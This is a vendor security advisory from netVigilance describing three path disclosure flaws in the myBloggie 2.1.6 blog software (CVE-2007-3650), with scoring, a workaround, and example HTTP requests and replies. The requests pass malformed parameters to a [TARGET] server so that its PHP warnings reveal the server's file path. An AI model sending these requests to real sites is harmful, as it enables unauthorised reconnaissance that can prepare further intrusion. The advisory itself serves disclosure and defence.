CVE Logo

 

 

 

Best Security Research

 »  netVigilance is an active contributor to nvd.nist.gov
 
 » Every vulnerability in our database is independently scored according to CVSS 2.0
 
 » Our Scoring is compared to nvd.nist.gov and inconsistencies are reported to the NVD team at NIST
 
 »

netVigilance is responsible for more than 400 changes to the National Vulnerability Database - more than anyone else.
 

 » Our Professional Services team will validate any vulnerability Scoring for you.
 
netVigilance Security Advisory
 
 
 
myBloggie version 2.1.6 Multiple Path
 
Disclosure Vulnerabilities
*

Fact: More than 15 vulnerabilities were discovered EVERY day of 2009

Description:

myBloggie is considered one of the most simple, user-friendliest yet packed with features Weblog system available to date. Built using PHP & mySQL, web most popular scripting language & database system enable myBloggie to be installed in any webservers.

Security problems in the product allow attackers to gather the true path of the server-side script.

External References:
Mitre CVE: CVE-2007-3650
NVD NIST: CVE-2007-3650


Summary:
myBloggie is weblog system built using PHP & mySQL, web's most popular scripting language & database system which enable myBloggie to be installed in any web server.

Release Date:
June 30 2008

Severity:
Risk: Medium

Access Vector: Network
Access Complexity: Low
Authentication: None
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
CVSS Base Score: 5.0

Target Distribution on Internet: Low

Exploitability: Functional Exploit
Remediation Level: Workaround
Report Confidence: Uncorroborated


SecureScout Testcase ID:
TC 17970

Vulnerable Systems:
myBloggie version 2.1.6

Vulnerability Type:
Program flaws - The product scripts have flaws which lead to Warnings or even Fatal Errors.

Vendor:
myWebland

Vendor Status:
The Vendor has been notified April 9th 2007, but did not respond.

Workaround:
Disable warning messages: modify in the php.ini file following line:
display_errors = Off.

Example:

Path Disclosure Vulnerability 1:

REQUEST:

(PHP <5.0.0 and Windows Hosting are required)

http://[TARGET]/[PRODUCT DIRECTORY]/index.php?month_no=2&year=10000
REPLY:
...
Warning: mktime(): Windows does not support negative values for this function in [DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php on line 28

Warning: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in [DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php on line 28

...
Warning: mktime(): Windows does not support negative values for this function in [DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php on line 44

Warning: date(): Windows does not support dates prior to midnight (00:00:00), January 1, 1970 in [DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php on line 44

...

Path Disclosure Vulnerability 2:

REQUEST:
http://[TARGET]/[PRODUCT DIRECTORY]/common.php
REPLY:
...
Warning: preg_replace(): Empty regular expression in [DISCLOSED PATH][PRODUCT DIRECTORY]\common.php on line 79

...

Path Disclosure Vulnerability 3:

REQUEST:
http://[TARGET]/[PRODUCT DIRECTORY]/login.php?mode[]=login
REPLY:
...
Warning: htmlspecialchars() expects parameter 1 to be string, array given in [DISCLOSED PATH][PRODUCT DIRECTORY]\login.php on line 39

...



Credits:
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com


back to Security Advisories 
 

Copyright©2004-2011,  netVigilance, Inc.   All rights reserved  • Privacy Policy

netVigilance©